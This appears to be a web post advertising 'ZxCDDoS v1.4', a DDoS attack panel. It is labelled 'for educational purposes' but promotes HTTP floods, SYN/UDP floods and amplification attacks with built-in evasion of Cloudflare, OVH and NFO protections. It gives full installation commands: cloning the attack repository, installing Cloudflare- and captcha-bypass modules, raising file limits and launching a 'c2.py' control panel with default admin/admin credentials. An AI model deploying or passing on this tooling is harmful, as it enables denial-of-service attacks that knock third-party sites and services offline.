ZxCDDoS v1.4 is a free, open-source DDoS panel for educational purposes, packing Layer 7, Layer 4, and AMP methods to bypass protections like Cloudflare, OVH, and NFO.
Key Features
- Open Source & Free: Grab it from GitHub, no cost to deploy.
- Multi-Layer Attacks: Layer 7 (HTTP floods), Layer 4 (SYN/UDP), AMP (amplification).
- Bypass Capabilities: Built-in evasion for Cloudflare, OVH, NFO.
- Simple & Efficient: Terminal panel, best on high-speed VPS (Google Cloud, Azure).
- Multi-Language: JavaScript core with Python, Perl support.
Installation Steps
Run on a high-bandwidth VPS (e.g., Google Cloud, Azure shells) for maximum power. Full installation commands:
CentOS / Debian / Ubuntu
# CentOS
yum install git -y
yum install golang -y
yum install perl -y
yum install python2 -y
yum install python3 -y
yum install python3-pip -y
yum install nodejs -y
yum install npm -y
# Debian, Ubuntu
sudo apt-get install git -y
sudo apt-get install golang -y
sudo apt-get install perl -y
sudo apt-get install python3 -y
sudo apt-get install python2 -y
sudo apt-get install python3-pip -y
sudo apt-get install nodejs -y
sudo apt-get install npm -y
# Clone & Dependencies
git clone https://github.com/lrbilooI/Zxd.git
cd ZxCDDoS/
npm i requests
npm i https-proxy-agent
npm i crypto-random-string
npm i events
npm i fs
npm i net
npm i cloudscraper
npm i request
npm i hcaptcha-solver
npm i randomstring
npm i cluster
npm i cloudflare-bypasser
pip3 install -r requirements.txt
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
apt-get install ./google-chrome-stable_current_amd64.deb
ulimit -n 999999
chmod 777 *
python3 c2.py
Launch the panel: Username admin Password admin







0 Comments